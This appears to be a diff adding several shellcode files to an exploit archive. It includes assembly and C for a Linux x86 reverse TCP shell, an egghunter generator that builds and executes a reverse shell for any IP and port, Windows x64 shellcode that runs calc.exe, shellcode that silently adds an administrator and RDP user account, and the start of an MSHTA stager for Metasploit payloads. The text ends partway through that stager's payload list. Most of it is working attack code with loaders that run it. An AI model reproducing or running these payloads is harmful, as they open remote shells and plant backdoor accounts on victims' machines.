; save returned file descriptor from eax into esi for later use
mov esi, eax
; socketcall (0x66)
; syscall SYS_CONNECT (0x03) - int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
mov al, 0x66
mov bl, 0x03
; pushing arguments to the stack backwards:
; connect(sockid, (struct sockaddr *) &addrport, sizeof(addrport));
push 0x0101017f ; 127.1.1.1
push word 0x5c11 ; port 4444
push word 0x02 ; PF_INET
mov ecx, esp
push 0x10 ; sockaddr length
push ecx ; sockaddr pointer
push esi ; saved socket descriptor
mov ecx, esp
; syscall
int 0x80
; dup2 - __NR_dup2 63
; dup2(0), dup2(1), dup2(2)
; (0 - stdin, 1 - stdout, 2 - stderr)
; let's put all this in a loop
xor ecx, ecx
DUPCOUNT:
; int dup2(int oldfd, int newfd);
xor eax, eax
mov al, 0x3f
; ebx (socket descriptor, being copied over from esi saved earlier)
; ecx will be calculated automatically based on the loop value
; xor ebx, ebx
mov ebx, esi ; saved socket descriptor
; syscall
int 0x80
inc cl
cmp cx, 2
jle DUPCOUNT ; count until 2 is reached
; execve (0x0b)
; /bin//sh
xor eax, eax
; xor ebx, ebx
push eax ; reserve some bytes in the stack to work with
mov al, 0x0b
push 0x68732f2f ; //sh
push 0x6e69622f ; /bin
mov ebx, esp
xor ecx, ecx
; syscall
int 0x80
***/

214
shellcodes/linux_x86/50141.c Normal file
View file

@ -0,0 +1,214 @@
# Exploit Title: Linux/x86 - Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode
# Date: 18/07/2021
# Exploit Author: d7x
# Tested on: Ubuntu x86
/***
Linux/x86 - Egghunter Reverse TCP Shell Shellcode Generator with dynamic IP and port Shellcode
Author: d7x
https://d7x.promiselabs.net/
https://www.promiselabs.net/
***/
/*
Egghunter payloads from skape modified to work on a modern up to date architecture
For detailed information on the egghunter payloads and egghunter research refer to the original whitepaper by skape:
Safely Searching Process Virtual Address Space http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
Example usage of egghunters https://www.fuzzysecurity.com/tutorials/expDev/4.html
*/
/* Usage: $ gcc -fno-stack-protector -z execstack -o egghunter egghunter_shellcode.c
$ ./egghunter 2 3d7xC0D3 192.168.1.137 6666 # This will output AND execute the egghunter! (if you get a seg fault/core dumped error either your shellcode output contains null bytes or you have no idea what you are doing)
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
void PrintShellcode(unsigned char* s);
void change_shellcode_bytes(unsigned char shellcode[], int offset, int n, unsigned char new[]);
unsigned char* ConvertStrToHex(unsigned char* s);
unsigned char egghunter[][200] = { \
{"\xBB\x90\x50\x90\x50\x31\xC9\xF7\xE1\x66\x81\xCA\xFF\x0F\x42\x60\x8D\x5A\x04\xB0\x21\xCD\x80\x3C\xF2\x61\x74\xED\x39\x1A\x75\xEE\x39\x5A\x04\x75\xE9\xFF\xE2"}, // access method - 39 bytes
{"\x31\xC9\x31\xD2\x66\x81\xCA\xFF\x0F\x42\x8D\x5A\x04\x6A\x21\x58\xCD\x80\x3C\xF2\x74\xEE\xB8\x90\x50\x90\x50\x89\xD7\xAF\x75\xE9\xAF\x75\xE6\xFF\xE7"}, //access revisited (fixed) - 37 bytes
{"\x31\xC9\x66\x81\xC9\xFF\x0F\x41\x6A\x43\x58\xCD\x80\x3C\xF2\x74\xF1\xB8\x90\x50\x90\x50\x89\xCF\xAF\x75\xEC\xAF\x75\xE9\xFF\xE7"} //sigaction method (fixed) - 32 bytes
};
/* unsigned char egghunter[] = \
"\x31\xC9\x66\x81\xC9\xFF\x0F\x41\x6A\x43\x58\xCD\x80\x3C\xF2\x74\xF1\xB8\x90\x50\x90\x50\x89\xCF\xAF\x75\xEC\xAF\x75\xE9\xFF\xE7"; //sigaction method (fixed) - 32 bytes
//"\x66\x81\xC9\xFF\x0F\x41\x6A\x43\x58\xCD\x80\x3C\xF2\x74\xF1\xB8\x90\x50\x90\x50\x89\xCF\xAF\x75\xEC\xAF\x75\xE9\xFF\xE7"; //sigaction method (original version by skape - 30 bytes)
//"\x31\xC9\x31\xD2\x66\x81\xCA\xFF\x0F\x42\x8D\x5A\x04\x6A\x21\x58\xCD\x80\x3C\xF2\x74\xEE\xB8\x90\x50\x90\x50\x89\xD7\xAF\x75\xE9\xAF\x75\xE6\xFF\xE7"; //access revisited (fixed) - 37 bytes
//"\x31\xD2\x66\x81\xCA\xFF\x0F\x42\x8D\x5A\x04\x6A\x21\x58\xCD\x80\x3C\xF2\x74\xEE\xB8\x90\x50\x90\x50\x89\xD7\xAF\x75\xE9\xAF\x75\xE6\xFF\xE7"; //access revisited (original version by skape) - 35 bytes
//"\xBB\x90\x50\x90\x50\x31\xC9\xF7\xE1\x66\x81\xCA\xFF\x0F\x42\x60\x8D\x5A\x04\xB0\x21\xCD\x80\x3C\xF2\x61\x74\xED\x39\x1A\x75\xEE\x39\x5A\x04\x75\xE9\xFF\xE2"; // access method - 39 bytes
*/
/* Reverse TCP Shell:
egg \x90\x50\x90\x50\x90\x50\x90\x50
127.1.1.1 4444 */
unsigned char shellcode[] = \
"\x90\x50\x90\x50\x90\x50\x90\x50\x31\xc0\x31\xdb\xb0\x66\xb3\x01\x31\xd2\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x03\x68\x7f\x01\x01\x01\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x31\xc9\x31\xc0\xb0\x3f\x89\xf3\xcd\x80\xfe\xc1\x66\x83\xf9\x02\x7e\xf0\x31\xc0\x50\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"; //IP address at eggsize + 26th byte; Port at eggsize + 32nd byte
int eggsize = 4; //default
main(int argc, char *argv[])
{
if (argc < 2)
{
printf("Usage: %s <egghunter> [egg] [IP] [Port]", argv[0]);
printf("\nExample: %s 0 0x9050 127.1.1 4444\n"
"%s 1 AABB 127.1.1.1 4444\n"
"%s 2 AABBCCDD 127.1.1.1 4444\n"
"%s 2 3d7xC0D3 127.1.1.1 4444\n", argv[0], argv[0], argv[0], argv[0]);
printf("\n\nDefault egg: \\x90\\x50\\x90\\x50 (push eax, nop, push eax, nop)"
"\nDefault shellcode IP and port 127.1.1.1:4444");
printf("\n\nAvailable egghunters:"
"\n0 - access method (39 bytes), requires executable egg"
"\n1 - access revisited (37 bytes)"
"\n2 - sigaction (32 bytes)\n"
);
return 0;
}
int eh = atoi((char *)argv[1]);
if (eh < 0 || eh > 2)
{
printf("Invalid Egghunter: %d!\n", eh);
return 0;
}
if (argc > 2)
{
if (argv[2][0] == '0' && argv[2][1] == 'x') argv[2] += 2;
if (strlen(argv[2]) != 4 && strlen(argv[2]) != 8)
{
printf("Egg has to be at least 4 or exactly 8 bytes!"
"\nExample eggs: 9050, 9060, C0D3,"
"\n d7xC0D3D, 3d7xC0D3, 3d7xC0D3, 7d7xC0D3"
"\n"
);
return 0;
}
int i;
for (i = 0; i < strlen(argv[2]); i+=2)
if (argv[2][i] == '0' && argv[2][i+1] == '0')
{
printf("No null bytes!\n");
return 0;
}
}
/* change egg if provided */
int eh_offset = 1; // default offset for access method (39 bytes)
if (eh == 1) eh_offset = 23; // offset for access revisited (37 bytes)
else if (eh ==2) eh_offset = 18; // offset for sigaction (32 bytes)
if (argc > 2) {
unsigned char* new_egg = argv[2], *s, *tmp;
printf("Changing egg to %s...\n", new_egg);
s = ConvertStrToHex(argv[2]);
tmp = s;
//fill buffer - 4 bytes of [egg], then concatenate additional 4 bytes of [egg] (8 bytes)
strcat(tmp, s);
if (strlen(argv[2]) == 4)
strcat(tmp, tmp);
//PrintShellcode(s);
change_shellcode_bytes(egghunter[eh], eh_offset, eh_offset+3, s);
change_shellcode_bytes(shellcode, 0, 7, tmp);
}
printf("Egghunter %d, size %d\n", eh, strlen(egghunter[eh] ) );
printf("Egghunter shellcode: \n");
PrintShellcode(egghunter[eh]);
printf("\nReverse TCP Shellcode (%d bytes): \n", strlen(shellcode));
// change shellcode IP address
unsigned char *s2 = shellcode;
if (argc > 3)
{
printf("%s\n", argv[3]);
// convert IP address to binary representation and store in ipaddr.sin_addr.s_addr
struct sockaddr_in ipaddr;
inet_aton(argv[3], &ipaddr.sin_addr.s_addr);
int i = eggsize*2+26, a;
int e = i+3;
for (i, a = 0; i <= e; i++, a+=8)
{
s2[i] = (ipaddr.sin_addr.s_addr >> a) & 0xff ;
printf("Byte %d: %.02x\n", i, s2[i]);
}
}
// change shellcode Port
int port = 4444; //0x115c - default
if (argc > 4)
{
port = atoi(argv[4]);
unsigned int p1 = (port >> 8) & 0xff;
unsigned int p2 = port & 0xff;
s2[eggsize*2+32] = (unsigned char){p1};
s2[eggsize*2+33] = (unsigned char){p2};
}
printf("Port %d\n", port);
PrintShellcode(s2);
printf("\n");
int (*ret)() = (int(*)())egghunter[eh];
ret();
}
void change_shellcode_bytes(unsigned char* shellcode_n, int offset, int n, unsigned char* new)
{
int i, a;
for (i = offset, a = 0; i <= n; i++, a++)
shellcode_n[i] = (unsigned char) {new[a]};
// printf("Byte %d: %.02x\n", i, shellcode_n[i]);
}
void PrintShellcode(unsigned char* s)
{
printf("\"");
while (*s)
printf("\\x%.02x", (unsigned int) *s++);
printf("\"\n");
}
unsigned char* ConvertStrToHex(unsigned char* s)
{
if (s[0] == '0' && s[1] == 'x') s += 2;
unsigned char buf[strlen(s)/2];
buf[strlen(s)/2] = '\0';
int len = sizeof(buf);
size_t count;
for (count = 0; count < len; count++) {
sscanf(s, "%2hhx", &buf[count]);
s += 2;
}
return buf;
}

133
shellcodes/windows_x86-64/49819.c Normal file
View file

@ -0,0 +1,133 @@
# Shellcode Title: Windows/x64 - Dynamic Null-Free WinExec PopCalc Shellcode (205 Bytes)
# Shellcode Author: Bobby Cooke (boku)
# Date: 02/05/2021
# Tested on: Windows 10 v2004 (x64)
# Shellcode Description:
# 64bit Windows 10 shellcode that dynamically resolves the base address of kernel32.dll via PEB & ExportTable method.
# Contains no Null bytes (0x00), and therefor will not crash if injected into typical stack Buffer OverFlow vulnerabilities.
# Grew tired of Windows Defender alerts from MSF code when developing, so built this as a template for development of advanced payloads.
; Compile & get shellcode from Kali:
; nasm -f win64 popcalc.asm -o popcalc.o
; for i in $(objdump -D popcalc.o | grep "^ " | cut -f2); do echo -n "\x$i" ; done
; Get kernel32.dll base address
xor rdi, rdi ; RDI = 0x0
mul rdi ; RAX&RDX =0x0
mov rbx, gs:[rax+0x60] ; RBX = Address_of_PEB
mov rbx, [rbx+0x18] ; RBX = Address_of_LDR
mov rbx, [rbx+0x20] ; RBX = 1st entry in InitOrderModuleList / ntdll.dll
mov rbx, [rbx] ; RBX = 2nd entry in InitOrderModuleList / kernelbase.dll
mov rbx, [rbx] ; RBX = 3rd entry in InitOrderModuleList / kernel32.dll
mov rbx, [rbx+0x20] ; RBX = &kernel32.dll ( Base Address of kernel32.dll)
mov r8, rbx ; RBX & R8 = &kernel32.dll
; Get kernel32.dll ExportTable Address
mov ebx, [rbx+0x3C] ; RBX = Offset NewEXEHeader
add rbx, r8 ; RBX = &kernel32.dll + Offset NewEXEHeader = &NewEXEHeader
xor rcx, rcx ; Avoid null bytes from mov edx,[rbx+0x88] by using rcx register to add
add cx, 0x88ff
shr rcx, 0x8 ; RCX = 0x88ff --> 0x88
mov edx, [rbx+rcx] ; EDX = [&NewEXEHeader + Offset RVA ExportTable] = RVA ExportTable
add rdx, r8 ; RDX = &kernel32.dll + RVA ExportTable = &ExportTable
; Get &AddressTable from Kernel32.dll ExportTable
xor r10, r10
mov r10d, [rdx+0x1C] ; RDI = RVA AddressTable
add r10, r8 ; R10 = &AddressTable
; Get &NamePointerTable from Kernel32.dll ExportTable
xor r11, r11
mov r11d, [rdx+0x20] ; R11 = [&ExportTable + Offset RVA Name PointerTable] = RVA NamePointerTable
add r11, r8 ; R11 = &NamePointerTable (Memory Address of Kernel32.dll Export NamePointerTable)
; Get &OrdinalTable from Kernel32.dll ExportTable
xor r12, r12
mov r12d, [rdx+0x24] ; R12 = RVA OrdinalTable
add r12, r8 ; R12 = &OrdinalTable
jmp short apis
; Get the address of the API from the Kernel32.dll ExportTable
getapiaddr:
pop rbx ; save the return address for ret 2 caller after API address is found
pop rcx ; Get the string length counter from stack
xor rax, rax ; Setup Counter for resolving the API Address after finding the name string
mov rdx, rsp ; RDX = Address of API Name String to match on the Stack
push rcx ; push the string length counter to stack
loop:
mov rcx, [rsp] ; reset the string length counter from the stack
xor rdi,rdi ; Clear RDI for setting up string name retrieval
mov edi, [r11+rax*4] ; EDI = RVA NameString = [&NamePointerTable + (Counter * 4)]
add rdi, r8 ; RDI = &NameString = RVA NameString + &kernel32.dll
mov rsi, rdx ; RSI = Address of API Name String to match on the Stack (reset to start of string)
repe cmpsb ; Compare strings at RDI & RSI
je resolveaddr ; If match then we found the API string. Now we need to find the Address of the API
incloop:
inc rax
jmp short loop
; Find the address of GetProcAddress by using the last value of the Counter
resolveaddr:
pop rcx ; remove string length counter from top of stack
mov ax, [r12+rax*2] ; RAX = [&OrdinalTable + (Counter*2)] = ordinalNumber of kernel32.<API>
mov eax, [r10+rax*4] ; RAX = RVA API = [&AddressTable + API OrdinalNumber]
add rax, r8 ; RAX = Kernel32.<API> = RVA kernel32.<API> + kernel32.dll BaseAddress
push rbx ; place the return address from the api string call back on the top of the stack
ret ; return to API caller
apis: ; API Names to resolve addresses
; WinExec | String length : 7
xor rcx, rcx
add cl, 0x7 ; String length for compare string
mov rax, 0x9C9A87BA9196A80F ; not 0x9C9A87BA9196A80F = 0xF0,WinExec
not rax ;mov rax, 0x636578456e6957F0 ; cexEniW,0xF0 : 636578456e6957F0 - Did Not to avoid WinExec returning from strings static analysis
shr rax, 0x8 ; xEcoll,0xFFFF --> 0x0000,xEcoll
push rax
push rcx ; push the string length counter to stack
call getapiaddr ; Get the address of the API from Kernel32.dll ExportTable
mov r14, rax ; R14 = Kernel32.WinExec Address
; UINT WinExec(
; LPCSTR lpCmdLine, => RCX = "calc.exe",0x0
; UINT uCmdShow => RDX = 0x1 = SW_SHOWNORMAL
; );
xor rcx, rcx
mul rcx ; RAX & RDX & RCX = 0x0
; calc.exe | String length : 8
push rax ; Null terminate string on stack
mov rax, 0x9A879AD19C939E9C ; not 0x9A879AD19C939E9C = "calc.exe"
not rax
;mov rax, 0x6578652e636c6163 ; exe.clac : 6578652e636c6163
push rax ; RSP = "calc.exe",0x0
mov rcx, rsp ; RCX = "calc.exe",0x0
inc rdx ; RDX = 0x1 = SW_SHOWNORMAL
sub rsp, 0x20 ; WinExec clobbers first 0x20 bytes of stack (Overwrites our command string when proxied to CreatProcessA)
call r14 ; Call WinExec("calc.exe", SW_HIDE)
###########################################################################################################################################
// runShellcode.c
// C Shellcode Run Code referenced from reenz0h (twitter: @sektor7net)
#include <windows.h>
void main() {
void* exec;
BOOL rv;
HANDLE th;
DWORD oldprotect = 0;
// Shellcode
unsigned char payload[] =
"\x48\x31\xff\x48\xf7\xe7\x65\x48\x8b\x58\x60\x48\x8b\x5b\x18\x48\x8b\x5b\x20\x48\x8b\x1b\x48\x8b\x1b\x48\x8b\x5b\x20\x49\x89\xd8\x8b"
"\x5b\x3c\x4c\x01\xc3\x48\x31\xc9\x66\x81\xc1\xff\x88\x48\xc1\xe9\x08\x8b\x14\x0b\x4c\x01\xc2\x4d\x31\xd2\x44\x8b\x52\x1c\x4d\x01\xc2"
"\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4d\x31\xe4\x44\x8b\x62\x24\x4d\x01\xc4\xeb\x32\x5b\x59\x48\x31\xc0\x48\x89\xe2\x51\x48\x8b"
"\x0c\x24\x48\x31\xff\x41\x8b\x3c\x83\x4c\x01\xc7\x48\x89\xd6\xf3\xa6\x74\x05\x48\xff\xc0\xeb\xe6\x59\x66\x41\x8b\x04\x44\x41\x8b\x04"
"\x82\x4c\x01\xc0\x53\xc3\x48\x31\xc9\x80\xc1\x07\x48\xb8\x0f\xa8\x96\x91\xba\x87\x9a\x9c\x48\xf7\xd0\x48\xc1\xe8\x08\x50\x51\xe8\xb0"
"\xff\xff\xff\x49\x89\xc6\x48\x31\xc9\x48\xf7\xe1\x50\x48\xb8\x9c\x9e\x93\x9c\xd1\x9a\x87\x9a\x48\xf7\xd0\x50\x48\x89\xe1\x48\xff\xc2"
"\x48\x83\xec\x20\x41\xff\xd6";
unsigned int payload_len = 205;
exec = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
RtlMoveMemory(exec, payload, payload_len);
rv = VirtualProtect(exec, payload_len, PAGE_EXECUTE_READ, &oldprotect);
th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)exec, 0, 0, 0);
WaitForSingleObject(th, -1);
}

193
shellcodes/windows_x86-64/49820.c Normal file
View file

@ -0,0 +1,193 @@
# Shellcode Title: Windows/x64 - Dynamic NoNull Add RDP Admin (BOKU:SP3C1ALM0V3) Shellcode (387 Bytes)
# Shellcode Author: Bobby Cooke (boku)
# Date: 02/05/2021
# Tested on: Windows 10 v2004 (x64)
# Compiled from: Kali Linux (x86_64)
# Full Disclosure: github.com/boku7/x64win-AddRdpAdminShellcode
# Shellcode Description:
# 64bit Windows 10 shellcode that adds user BOKU:SP3C1ALM0V3 to the system and the localgroups
# Administrators & "Remote Desktop Users". Position Independent Code (PIC) that dynamically resolves
# KERNEL32 DLL via PEB & LDR. Shellcode contains no null bytes, and therefor can be used on typical
# stack based Buffer OverFlow vulnerabilities. Shellcode must be executed from a process with either
# a HIGH or SYSTEM integrity level.
; nasm -f win64 addRdpAdmin.asm -o addRdpAdmin.o
; for i in $(objdump -D addRdpAdmin.o | grep "^ " | cut -f2); do echo -n "\x$i" ; done
; Get kernel32.dll base address
xor rdi, rdi ; RDI = 0x0
mul rdi ; RAX&RDX =0x0
mov rbx, gs:[rax+0x60] ; RBX = Address_of_PEB
mov rbx, [rbx+0x18] ; RBX = Address_of_LDR
mov rbx, [rbx+0x20] ; RBX = 1st entry in InitOrderModuleList / ntdll.dll
mov rbx, [rbx] ; RBX = 2nd entry in InitOrderModuleList / kernelbase.dll
mov rbx, [rbx] ; RBX = 3rd entry in InitOrderModuleList / kernel32.dll
mov rbx, [rbx+0x20] ; RBX = &kernel32.dll ( Base Address of kernel32.dll)
mov r8, rbx ; RBX & R8 = &kernel32.dll
; Get kernel32.dll ExportTable Address
mov ebx, [rbx+0x3C] ; RBX = Offset NewEXEHeader
add rbx, r8 ; RBX = &kernel32.dll + Offset NewEXEHeader = &NewEXEHeader
xor rcx, rcx ; Avoid null bytes from mov edx,[rbx+0x88] by using rcx register to add
add cx, 0x88ff
shr rcx, 0x8 ; RCX = 0x88ff --> 0x88
mov edx, [rbx+rcx] ; EDX = [&NewEXEHeader + Offset RVA ExportTable] = RVA ExportTable
add rdx, r8 ; RDX = &kernel32.dll + RVA ExportTable = &ExportTable
; Get &AddressTable from Kernel32.dll ExportTable
xor r10, r10
mov r10d, [rdx+0x1C] ; RDI = RVA AddressTable
add r10, r8 ; R10 = &AddressTable
; Get &NamePointerTable from Kernel32.dll ExportTable
xor r11, r11
mov r11d, [rdx+0x20] ; R11 = [&ExportTable + Offset RVA Name PointerTable] = RVA NamePointerTable
add r11, r8 ; R11 = &NamePointerTable (Memory Address of Kernel32.dll Export NamePointerTable)
; Get &OrdinalTable from Kernel32.dll ExportTable
xor r12, r12
mov r12d, [rdx+0x24] ; R12 = RVA OrdinalTable
add r12, r8 ; R12 = &OrdinalTable
jmp short apis
; Get the address of the API from the Kernel32.dll ExportTable
getapiaddr:
pop rbx ; save the return address for ret 2 caller after API address is found
pop rcx ; Get the string length counter from stack
xor rax, rax ; Setup Counter for resolving the API Address after finding the name string
mov rdx, rsp ; RDX = Address of API Name String to match on the Stack
push rcx ; push the string length counter to stack
loop:
mov rcx, [rsp] ; reset the string length counter from the stack
xor rdi,rdi ; Clear RDI for setting up string name retrieval
mov edi, [r11+rax*4] ; EDI = RVA NameString = [&NamePointerTable + (Counter * 4)]
add rdi, r8 ; RDI = &NameString = RVA NameString + &kernel32.dll
mov rsi, rdx ; RSI = Address of API Name String to match on the Stack (reset to start of string)
repe cmpsb ; Compare strings at RDI & RSI
je resolveaddr ; If match then we found the API string. Now we need to find the Address of the API
incloop:
inc rax
jmp short loop
; Find the address of GetProcAddress by using the last value of the Counter
resolveaddr:
pop rcx ; remove string length counter from top of stack
mov ax, [r12+rax*2] ; RAX = [&OrdinalTable + (Counter*2)] = ordinalNumber of kernel32.<API>
mov eax, [r10+rax*4] ; RAX = RVA API = [&AddressTable + API OrdinalNumber]
add rax, r8 ; RAX = Kernel32.<API> = RVA kernel32.<API> + kernel32.dll BaseAddress
push rbx ; place the return address from the api string call back on the top of the stack
ret ; return to API caller
apis: ; API Names to resolve addresses
; WinExec | String length : 7
xor rcx, rcx
add cl, 0x7 ; String length for compare string
mov rax, 0x9C9A87BA9196A80F ; not 0x9C9A87BA9196A80F = 0xF0,WinExec
not rax ;mov rax, 0x636578456e6957F0 ; cexEniW,0xF0 : 636578456e6957F0 - Did Not to avoid WinExec returning from strings static analysis
shr rax, 0x8 ; cexEniW,0xF0 --> 0x00,cexEniW
push rax
push rcx ; push the string length counter to stack
call getapiaddr ; Get the address of the API from Kernel32.dll ExportTable
mov r14, rax ; R14 = Kernel32.WinExec Address
jmp short command
WinExec:
; UINT WinExec(
; LPCSTR lpCmdLine, => RCX = <COMMAND STRING> + 0x00 (Null Terminated)
; UINT uCmdShow => RDX = 0x0 = SW_HIDE
; );
xor rdx, rdx ; RDX = 0x0 = SW_HIDE
sub rsp, 0x20 ; WinExec clobbers first 0x20 bytes of stack (Overwrites our command string when proxied to CreatProcessA)
call r14 ; Call WinExec(<COMMNAD>, SW_HIDE)
add rsp, 0x20 ; Fix stack
ret
command:
; WinExec("cmd.exe /c net user BOKU SP3C1ALM0V3 /add && net localgroup Administrators BOKU /add && net localgroup \"Remote Desktop Users\" BOKU /add", 0x0);
; 63 6D 64 2E 65 78 65 20 2F 63 20 6E 65 74 20 75 cmd.exe /c net u
; 73 65 72 20 42 4F 4B 55 20 53 50 33 43 31 41 4C ser BOKU SP3C1AL
; 4D 30 56 33 20 2F 61 64 64 20 26 26 20 6E 65 74 M0V3 /add && net
; 20 6C 6F 63 61 6C 67 72 6F 75 70 20 41 64 6D 69 localgroup Admi
; 6E 69 73 74 72 61 74 6F 72 73 20 42 4F 4B 55 20 nistrators BOKU
; 2F 61 64 64 20 26 26 20 6E 65 74 20 6C 6F 63 61 /add && net loca
; 6C 67 72 6F 75 70 20 22 52 65 6D 6F 74 65 20 44 lgroup "Remote D
; 65 73 6B 74 6F 70 20 55 73 65 72 73 22 20 42 4F esktop Users" BO
; 4B 55 20 2F 61 64 64 00 KU /add.
; String length : 135
mov rax, 0x6464612f20554bFF ; dda/ UK : 6464612f20554b
shr rax, 0x8
push rax
mov rax, 0x4f42202273726573 ; OB "sres : 4f42202273726573
push rax
mov rax, 0x5520706f746b7365 ; U potkse : 5520706f746b7365
push rax
mov rax, 0x442065746f6d6552 ; D etomeR : 442065746f6d6552
push rax
mov rax, 0x222070756f72676c ; " puorgl : 222070756f72676c
push rax
mov rax, 0x61636f6c2074656e ; acol ten : 61636f6c2074656e
push rax
mov rax, 0x202626206464612f ; && dda/ : 202626206464612f
push rax
mov rax, 0x20554b4f42207372 ; UKOB sr : 20554b4f42207372
push rax
mov rax, 0x6f7461727473696e ; otartsin : 6f7461727473696e
push rax
mov rax, 0x696d64412070756f ; imdA puo : 696d64412070756f
push rax
mov rax, 0x72676c61636f6c20 ; rglacol : 72676c61636f6c20
push rax
mov rax, 0x74656e2026262064 ; ten && d : 74656e2026262064
push rax
mov rax, 0x64612f203356304d ; da/ 3V0M : 64612f203356304d
push rax
mov rax, 0x4c41314333505320 ; LA1C3PS : 4c41314333505320
push rax
mov rax, 0x554b4f4220726573 ; UKOB res : 554b4f4220726573
push rax
mov rax, 0x752074656e20632f ; u ten c/ : 752074656e20632f
push rax
mov rax, 0x206578652e646d63 ; exe.dmc : 206578652e646d63
push rax
mov rcx, rsp ; RCX = <COMMAND STRING>,0x0
call WinExec
###########################################################################################################################################
#include <windows.h>
// C Shellcode Run Code referenced from reenz0h (twitter: @sektor7net)
int main(void) {
void* exec_mem;
BOOL rv;
HANDLE th;
DWORD oldprotect = 0;
unsigned char payload[] =
"\x48\x31\xff\x48\xf7\xe7\x65\x48\x8b\x58\x60\x48\x8b\x5b\x18\x48\x8b\x5b\x20\x48\x8b\x1b\x48\x8b\x1b\x48\x8b\x5b\x20\x49"
"\x89\xd8\x8b\x5b\x3c\x4c\x01\xc3\x48\x31\xc9\x66\x81\xc1\xff\x88\x48\xc1\xe9\x08\x8b\x14\x0b\x4c\x01\xc2\x4d\x31\xd2\x44"
"\x8b\x52\x1c\x4d\x01\xc2\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4d\x31\xe4\x44\x8b\x62\x24\x4d\x01\xc4\xeb\x32\x5b\x59"
"\x48\x31\xc0\x48\x89\xe2\x51\x48\x8b\x0c\x24\x48\x31\xff\x41\x8b\x3c\x83\x4c\x01\xc7\x48\x89\xd6\xf3\xa6\x74\x05\x48\xff"
"\xc0\xeb\xe6\x59\x66\x41\x8b\x04\x44\x41\x8b\x04\x82\x4c\x01\xc0\x53\xc3\x48\x31\xc9\x80\xc1\x07\x48\xb8\x0f\xa8\x96\x91"
"\xba\x87\x9a\x9c\x48\xf7\xd0\x48\xc1\xe8\x08\x50\x51\xe8\xb0\xff\xff\xff\x49\x89\xc6\xeb\x0f\x48\x31\xd2\x48\x83\xec\x20"
"\x41\xff\xd6\x48\x83\xc4\x20\xc3\x48\xb8\xff\x4b\x55\x20\x2f\x61\x64\x64\x48\xc1\xe8\x08\x50\x48\xb8\x73\x65\x72\x73\x22"
"\x20\x42\x4f\x50\x48\xb8\x65\x73\x6b\x74\x6f\x70\x20\x55\x50\x48\xb8\x52\x65\x6d\x6f\x74\x65\x20\x44\x50\x48\xb8\x6c\x67"
"\x72\x6f\x75\x70\x20\x22\x50\x48\xb8\x6e\x65\x74\x20\x6c\x6f\x63\x61\x50\x48\xb8\x2f\x61\x64\x64\x20\x26\x26\x20\x50\x48"
"\xb8\x72\x73\x20\x42\x4f\x4b\x55\x20\x50\x48\xb8\x6e\x69\x73\x74\x72\x61\x74\x6f\x50\x48\xb8\x6f\x75\x70\x20\x41\x64\x6d"
"\x69\x50\x48\xb8\x20\x6c\x6f\x63\x61\x6c\x67\x72\x50\x48\xb8\x64\x20\x26\x26\x20\x6e\x65\x74\x50\x48\xb8\x4d\x30\x56\x33"
"\x20\x2f\x61\x64\x50\x48\xb8\x20\x53\x50\x33\x43\x31\x41\x4c\x50\x48\xb8\x73\x65\x72\x20\x42\x4f\x4b\x55\x50\x48\xb8\x2f"
"\x63\x20\x6e\x65\x74\x20\x75\x50\x48\xb8\x63\x6d\x64\x2e\x65\x78\x65\x20\x50\x48\x89\xe1\xe8\x2a\xff\xff\xff";
unsigned int payload_len = 387;
exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
// Copy payload to new buffer
RtlMoveMemory(exec_mem, payload, payload_len);
// Make new buffer as executable
rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);
// If all good, run the payload
if (rv != 0) {
th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)exec_mem, 0, 0, 0);
WaitForSingleObject(th, -1);
}
return 0;
}

185
shellcodes/windows_x86/49466.asm Normal file
View file

@ -0,0 +1,185 @@
# Exploit Title: Windows/x86 - Stager Generic MSHTA Shellcode (143 bytes)
# Exploit Author: Armando Huesca Prida
# Date: 11-01-2021
# Tested on: Windows 7 Professional 6.1.7601 SP1 Build 7601 (x86)
# Windows Vista Ultimate 6.0.6002 SP2 Build 6002 (x86)
# Windows Server 2003 Enterprise Edition 5.2.3790 SP1 Build 3790 (x86)
## Description: Windows x86 Shellcode that uses mshta.exe binary to execute a second stage payload delivered through metasploit's hta_server exploit. This shellcode uses JMP/CALL/POP technic and static kernel32.dll functions addresses.
## Metasploit compatible payload list:
# generic/custom
# generic/debug_trap
# generic/shell_bind_tcp
# generic/shell_reverse_tcp
# generic/tight_loop
# windows/dllinject/bind_hidden_ipknock_tcp
# windows/dllinject/bind_hidden_tcp
# windows/dllinject/bind_ipv6_tcp
# windows/dllinject/bind_ipv6_tcp_uuid
# windows/dllinject/bind_named_pipe
# windows/dllinject/bind_nonx_tcp
# windows/dllinject/bind_tcp
# windows/dllinject/bind_tcp_rc4
# windows/dllinject/bind_tcp_uuid
# windows/dllinject/reverse_hop_http
# windows/dllinject/reverse_http
# windows/dllinject/reverse_http_proxy_pstore
# windows/dllinject/reverse_ipv6_tcp
# windows/dllinject/reverse_nonx_tcp
# windows/dllinject/reverse_ord_tcp
# windows/dllinject/reverse_tcp
# windows/dllinject/reverse_tcp_allports
# windows/dllinject/reverse_tcp_dns
# windows/dllinject/reverse_tcp_rc4
# windows/dllinject/reverse_tcp_rc4_dns
# windows/dllinject/reverse_tcp_uuid
# windows/dllinject/reverse_winhttp
# windows/dns_txt_query_exec
# windows/download_exec
# windows/exec
# windows/loadlibrary
# windows/messagebox
# windows/meterpreter/bind_hidden_ipknock_tcp
# windows/meterpreter/bind_hidden_tcp
# windows/meterpreter/bind_ipv6_tcp
# windows/meterpreter/bind_ipv6_tcp_uuid
# windows/meterpreter/bind_named_pipe
# windows/meterpreter/bind_nonx_tcp
# windows/meterpreter/bind_tcp
# windows/meterpreter/bind_tcp_rc4
